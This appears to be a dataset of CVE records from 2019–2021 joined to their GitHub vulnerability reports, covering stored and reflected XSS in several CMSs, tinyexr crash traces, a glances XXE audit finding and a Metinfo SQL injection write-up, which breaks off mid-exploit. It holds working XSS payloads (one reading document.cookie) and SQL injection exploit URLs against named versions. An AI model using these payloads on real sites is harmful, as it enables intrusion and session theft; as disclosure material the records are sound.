**Describe the bug** An authenticated malicious user can take advantage of a Reflected XSS vulnerability in the "Document Manager" feature. **To Reproduce** Steps to reproduce the behavior: 1. Log into the /manager 2. Go to "Doc Manager" on Modules ![image](https://user-images.githubusercontent.com/50371661/83385199-04cb7d00-a413-11ea-846e-0edf22f919bf.png) 3. Insert payload: '><details/open/ontoggle=confirm(1337)> ![image](https://user-images.githubusercontent.com/50371661/83385327-37757580-a413-11ea-919b-5eff28d329d6.png) 4. Click "Submit" ![image](https://user-images.githubusercontent.com/50371661/83385349-43613780-a413-11ea-859c-a30440eef9a3.png) **Impact** Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. **Versions** Evolution CMS 2.0.2
Cross Site Scripting Vulnerability on "Document Manager" feature in Evolution 2.0.2
https://api.github.com/repos/evolution-cms/evolution/issues/1473/comments
3
2020-06-01T07:24:09Z
2025-05-26T02:35:05Z
https://github.com/evolution-cms/evolution/issues/1473
628,215,038
1,473
2,240
CVE-2020-23239
2021-07-26T20:15:08.387
Cross Site Scripting (XSS) vulnerability in Textpattern CMS 4.8.1 via Custom fields in the Menu Preferences feature.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/textpattern/textpattern/issues/1495" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/textpattern/textpattern/issues/1495" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:textpattern:textpattern:4.8.1:*:*:*:*:*:*:*", "matchCriteriaId": "8C8A2AA8-8B4D-432F-8FBF-AB3EEA8EA000", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/textpattern/textpattern/issues/1495
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "textpattern", "textpattern" ]
### Expected behaviour An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Menu Preferences" feature. ### Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. ### Steps to reproduce 1. Log into the Admin. 2. Go to "Menu Preferences" ![image](https://user-images.githubusercontent.com/50371661/83992566-f1706280-a97a-11ea-8d18-472d192dd652.png) 3. Click "Custom fields" ![image](https://user-images.githubusercontent.com/50371661/83992590-05b45f80-a97b-11ea-8de0-148011566b94.png) 4. Insert payload to Fields name: '><details/open/ontoggle=confirm(1337)> 5. Click Icon Textpattern: ![image](https://user-images.githubusercontent.com/50371661/83992709-63e14280-a97b-11ea-94c0-01dbe89ab2a3.png) ![image](https://user-images.githubusercontent.com/50371661/83992711-65126f80-a97b-11ea-8bc5-0ca9d6aac3fc.png) #### Additional information Textpattern version: 4.8.1
Cross Site Scripting Vulnerability on "Menu Preferences" feature in Textpattern v4.8.1
https://api.github.com/repos/textpattern/textpattern/issues/1495/comments
2
2020-06-08T04:30:19Z
2020-06-09T00:36:29Z
https://github.com/textpattern/textpattern/issues/1495
634,116,218
1,495
2,241
CVE-2020-23242
2021-07-26T21:15:16.657
Cross Site Scripting (XSS) vulnerability in NavigateCMS 2.9 when performing a Create or Edit via the Tools feature.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/NavigateCMS/Navigate-CMS/issues/16" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/NavigateCMS/Navigate-CMS/issues/16" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:naviwebs:navigatecms:2.9:*:*:*:*:*:*:*", "matchCriteriaId": "54FE5CDA-77C7-441D-A61C-FF8171A1DF30", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/NavigateCMS/Navigate-CMS/issues/16
[ "Exploit", "Third Party Advisory" ]
github.com
[ "NavigateCMS", "Navigate-CMS" ]
**Expected behaviour** An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Tools" feature. **Impact** Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. **Steps to reproduce** 1. Log into the Admin. 2. Go to function "Tools" 3. Click Web users ![image](https://user-images.githubusercontent.com/50371661/85011728-2efb9980-b18c-11ea-8a8a-92cb99c634fa.png) 4. Perform "Create" or "Edit" ![image](https://user-images.githubusercontent.com/50371661/85011905-6a966380-b18c-11ea-9e09-3a2af0e40bba.png) 5. Add payload in name via Personal: '><details/open/ontoggle=confirm(document.cookie)> 6. Load web: ![image](https://user-images.githubusercontent.com/50371661/85012289-03c57a00-b18d-11ea-886e-27e0f1f09da3.png) NavigateCMS 2.9
Cross Site Script Vulnerability on "Tools" feature in NavigateCMS 2.9
https://api.github.com/repos/NavigateCMS/Navigate-CMS/issues/16/comments
2
2020-06-18T10:57:00Z
2020-06-18T11:39:40Z
https://github.com/NavigateCMS/Navigate-CMS/issues/16
641,112,097
16
2,242
CVE-2020-23243
2021-07-26T21:15:16.693
Cross Site Scripting (XSS) vulnerability in NavigateCMS NavigateCMS 2.9 via the name="wrong_path_redirect" feature.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/NavigateCMS/Navigate-CMS/issues/18" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/NavigateCMS/Navigate-CMS/issues/18" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:naviwebs:navigatecms:2.9:*:*:*:*:*:*:*", "matchCriteriaId": "54FE5CDA-77C7-441D-A61C-FF8171A1DF30", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/NavigateCMS/Navigate-CMS/issues/18
[ "Exploit", "Third Party Advisory" ]
github.com
[ "NavigateCMS", "Navigate-CMS" ]
**Expected behaviour** An authenticated malicious user can take advantage of a Reflected XSS vulnerability in the **name="wrong_path_redirect"** feature. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site. **Steps to reproduce** 1. Log into the Admin. 2. Go to function "Web > Web sites" 3. Click website edit. 4. Use Burp Suite inject payload to **name="wrong_path_redirect"**: ![image](https://user-images.githubusercontent.com/50371661/85096111-84cc5200-b21d-11ea-9d77-055412721a6b.png) Request: http://10.14.140.69:8012/navigate/navigate/navigate.php?fid=websites&act=edit&id=3&tab=0 ![image](https://user-images.githubusercontent.com/50371661/85096160-b6ddb400-b21d-11ea-8467-f75ab83d3bae.png)
Cross Site Script Vulnerability NavigateCMS 2.9
https://api.github.com/repos/NavigateCMS/Navigate-CMS/issues/18/comments
1
2020-06-19T04:12:30Z
2020-06-19T07:15:02Z
https://github.com/NavigateCMS/Navigate-CMS/issues/18
641,690,547
18
2,243
CVE-2020-18428
2021-07-26T22:15:08.187
tinyexr commit 0.9.5 was discovered to contain an array index error in the tinyexr::SaveEXR component, which can lead to a denial of service (DOS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ChijinZ/security_advisories/tree/master/tinyexr_65f9859" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/syoyo/tinyexr/issues/109" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ChijinZ/security_advisories/tree/master/tinyexr_65f9859" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/syoyo/tinyexr/issues/109" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tinyexr_project:tinyexr:0.9.5:*:*:*:*:*:*:*", "matchCriteriaId": "6839BA33-4B4D-413F-8E81-0C4F9784EBBB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "129" ]
129
https://github.com/syoyo/tinyexr/issues/109
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "syoyo", "tinyexr" ]
I build tinyexr with clang and address sanitizer. When testcase (see: https://github.com/ChijinZ/security_advisories/blob/master/tinyexr_65f9859/crashes/out-of-range-in-tinyexr.h:13107) is input into test_tinyexr (command: ./test_tinyexr testcase), a out-of-range has triggered. (gdb) bt #0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51 #1 0x00007ffff6aba801 in __GI_abort () at abort.c:79 #2 0x00007ffff7ad88b7 in ?? () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 #3 0x00007ffff7adea06 in ?? () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 #4 0x00007ffff7adea41 in std::terminate() () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 #5 0x00007ffff7adec74 in __cxa_throw () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 #6 0x00007ffff7ada7b5 in ?? () from /usr/lib/x86_64-linux-gnu/libstdc++.so.6 #7 0x000000000058df09 in std::vector<float, std::allocator<float> >::_M_range_check (this=<optimized out>, __n=0) at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.3.0/../../../../include/c++/7.3.0/bits/stl_vector.h:825 #8 std::vector<float, std::allocator<float> >::at (this=<optimized out>, __n=0) at /usr/bin/../lib/gcc/x86_64-linux-gnu/7.3.0/../../../../include/c++/7.3.0/bits/stl_vector.h:846 #9 SaveEXR (data=<optimized out>, width=0, height=112, components=4, save_as_fp16=1, outfilename=0x5f38e0 <.str> "output.exr", err=<optimized out>) at /home/jin/Documents/cve/tinyexr/./tinyexr.h:13107 #10 0x000000000058f01c in main (argc=<optimized out>, argv=<optimized out>) at test_tinyexr.cc:141
## Out-of-range in function tinyexr::SaveEXR tinyexr.h:13107
https://api.github.com/repos/syoyo/tinyexr/issues/109/comments
0
2019-03-05T02:30:27Z
2019-03-05T07:55:11Z
https://github.com/syoyo/tinyexr/issues/109
417,084,649
109
2,244
CVE-2020-18430
2021-07-26T22:15:08.223
tinyexr 0.9.5 was discovered to contain an array index error in the tinyexr::DecodeEXRImage component, which can lead to a denial of service (DOS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ChijinZ/security_advisories/tree/master/tinyexr_65f9859" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/syoyo/tinyexr/issues/108" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ChijinZ/security_advisories/tree/master/tinyexr_65f9859" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/syoyo/tinyexr/issues/108" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tinyexr_project:tinyexr:0.9.5:*:*:*:*:*:*:*", "matchCriteriaId": "6839BA33-4B4D-413F-8E81-0C4F9784EBBB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "129" ]
129
https://github.com/syoyo/tinyexr/issues/108
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "syoyo", "tinyexr" ]
I build tinyexr with clang and address sanitizer. When testcase (see: https://github.com/ChijinZ/security_advisories/blob/master/tinyexr_65f9859/crashes/out-of-memory-in-tinyexr.h:11046) is input into test_tinyexr (command: ./test_tinyexr testcase), a out-of-memory has triggered. ==28640==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x3f8000b80 bytes #0 0x4f2bb2 in operator new(unsigned long) (/home/jin/Documents/cve/tinyexr/test_tinyexr+0x4f2bb2) #1 0x54833a in __gnu_cxx::new_allocator<unsigned long>::allocate(unsigned long, void const*) /usr/bin/../lib/gcc/x86_64-linux-gnu/7.3.0/../../../../include/c++/7.3.0/ext/new_allocator.h:111:27 #2 0x54833a in std::allocator_traits<std::allocator<unsigned long> >::allocate(std::allocator<unsigned long>&, unsigned long) /usr/bin/../lib/gcc/x86_64-linux-gnu/7.3.0/../../../../include/c++/7.3.0/bits/alloc_traits.h:436 #3 0x54833a in std::_Vector_base<unsigned long, std::allocator<unsigned long> >::_M_allocate(unsigned long) /usr/bin/../lib/gcc/x86_64-linux-gnu/7.3.0/../../../../include/c++/7.3.0/bits/stl_vector.h:172 #4 0x54833a in std::_Vector_base<unsigned long, std::allocator<unsigned long> >::_M_create_storage(unsigned long) /usr/bin/../lib/gcc/x86_64-linux-gnu/7.3.0/../../../../include/c++/7.3.0/bits/stl_vector.h:187 #5 0x54833a in std::_Vector_base<unsigned long, std::allocator<unsigned long> >::_Vector_base(unsigned long, std::allocator<unsigned long> const&) /usr/bin/../lib/gcc/x86_64-linux-gnu/7.3.0/../../../../include/c++/7.3.0/bits/stl_vector.h:138 #6 0x54833a in std::vector<unsigned long, std::allocator<unsigned long> >::vector(unsigned long, std::allocator<unsigned long> const&) /usr/bin/../lib/gcc/x86_64-linux-gnu/7.3.0/../../../../include/c++/7.3.0/bits/stl_vector.h:284 #7 0x54833a in tinyexr::DecodeEXRImage(_EXRImage*, _EXRHeader const*, unsigned char const*, unsigned char const*, unsigned long, char const**) /home/jin/Documents/cve/tinyexr/./tinyexr.h:11046 #8 0x54833a in LoadEXRImageFromMemory /home/jin/Documents/cve/tinyexr/./tinyexr.h:11625 #9 0x52f88e in LoadEXRImageFromFile /home/jin/Documents/cve/tinyexr/./tinyexr.h:11602:10 #10 0x522f17 in LoadEXR /home/jin/Documents/cve/tinyexr/./tinyexr.h:11161:15 #11 0x58ee40 in main /home/jin/Documents/cve/tinyexr/test_tinyexr.cc:130:13 #12 0x7f163a97fb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 ==28640==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory (/home/jin/Documents/cve/tinyexr/test_tinyexr+0x4f2bb2) in operator new(unsigned long) ==28640==ABORTING
## Out-of-memory in function tinyexr::DecodeEXRImage tinyexr.h:11046
https://api.github.com/repos/syoyo/tinyexr/issues/108/comments
0
2019-03-05T02:30:06Z
2019-03-05T07:55:07Z
https://github.com/syoyo/tinyexr/issues/108
417,084,555
108
2,245
CVE-2021-23418
2021-07-29T18:15:07.727
The package glances before 3.2.1 are vulnerable to XML External Entity (XXE) Injection via the use of Fault to parse untrusted XML data, which is known to be vulnerable to XML attacks.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nicolargo/glances/commit/4b87e979afdc06d98ed1b48da31e69eaa3a9fb94" }, { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nicolargo/glances/commit/85d5a6b4af31fcf785d5a61086cbbd166b40b07a" }, { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nicolargo/glances/commit/9d6051be4a42f692392049fdbfc85d5dfa458b32" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nicolargo/glances/issues/1025" }, { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-PYTHON-GLANCES-1311807" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nicolargo/glances/commit/4b87e979afdc06d98ed1b48da31e69eaa3a9fb94" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nicolargo/glances/commit/85d5a6b4af31fcf785d5a61086cbbd166b40b07a" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/nicolargo/glances/commit/9d6051be4a42f692392049fdbfc85d5dfa458b32" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nicolargo/glances/issues/1025" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-PYTHON-GLANCES-1311807" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:glances_project:glances:*:*:*:*:*:*:*:*", "matchCriteriaId": "705B1A67-A5F2-4E29-A99F-E66751399BB0", "versionEndExcluding": "3.2.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "611" ]
611
https://github.com/nicolargo/glances/issues/1025
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nicolargo", "glances" ]
#### Description bandit -r glances/ -------------------------------------------------- >> Issue: [B411:blacklist] Using Fault to parse untrusted XML data is known to be vulnerable to XML attacks. Use defused.xmlrpc.monkey_patch() function to monkey-patch xmlrpclib and mitigate XML vulnerabilities. Severity: High Confidence: High Location: glances/compat.py:91 90 from SimpleXMLRPCServer import SimpleXMLRPCRequestHandler, SimpleXMLRPCServer 91 from xmlrpclib import Fault, ProtocolError, ServerProxy, Transport 92 from urllib2 import urlopen, URLError #### Versions * Glances (glances -V): 2.8.1
Security audit - B411
https://api.github.com/repos/nicolargo/glances/issues/1025/comments
1
2017-02-06T17:11:26Z
2021-07-09T07:52:14Z
https://github.com/nicolargo/glances/issues/1025
205,649,917
1,025
2,246
CVE-2020-18175
2021-07-30T14:15:13.470
SQL Injection vulnerability in Metinfo 6.1.3 via a dosafety_emailadd action in basic.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sword1991912/metinfo/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sword1991912/metinfo/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:metinfo:metinfo:6.1.3:*:*:*:*:*:*:*", "matchCriteriaId": "16302753-B119-43BF-8AE2-75B538F5568B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/sword1991912/metinfo/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "sword1991912", "metinfo" ]
## Analysis Look at `/app/system/include/class/user.class.php` there is a function called `get_user_by_emailid` ``` public function get_user_by_emailid($email) { global $_M; $query = "SELECT * FROM {$_M['table']['user']} WHERE email='{$email}' AND lang='{$_M['lang']}'"; $user = DB::get_one($query); return $user; } ``` we can `$email` to directly into the SQL statement For convenience of debugging: ![15491914376368](https://user-images.githubusercontent.com/32212303/52681285-4615f000-2f76-11e9-8f30-0d4c16e4469b.jpg) ![15491913975762](https://user-images.githubusercontent.com/32212303/52681304-56c66600-2f76-11e9-9021-01c5093e9010.jpg) After that. visit the url:http://localhost:8081/member/basic.php?a=dosafety_emailadd ![15491916179568](https://user-images.githubusercontent.com/32212303/52681325-6f368080-2f76-11e9-9e02-6851e79cf929.jpg) as u can see, `123`has been inserted into SQL statement Then: http://localhost:8081/member/basic.php?a=dosafety_emailadd&p=f7d0QyEq6a5NyeiXr9%2BMf64AnQCUB6T1o8t0e5eJ2eyHrajOLzHX%2FOugywvVXSDmKIuR9pa9E2BmcV%2FcwaeQ5VMVwZaZ3ZPm7UEnPSjpXcLL%2BuhRntMMWop%2B49vcM9sIai4 ![15491918026785](https://user-images.githubusercontent.com/32212303/52681363-8c6b4f00-2f76-11e9-8962-527c69bc0e88.jpg) ## Exploit key is the only restriction (from`/config/config_safe.php` Called by auth class) If PHP-ts: ``` view-source:http://localhost:8081/config/config_safe.php ``` ![15491921327823](https://user-images.githubusercontent.com/32212303/52681399-9f7e1f00-2f76-11e9-9101-9bb1e659ccff.jpg) elif PHP-nts: 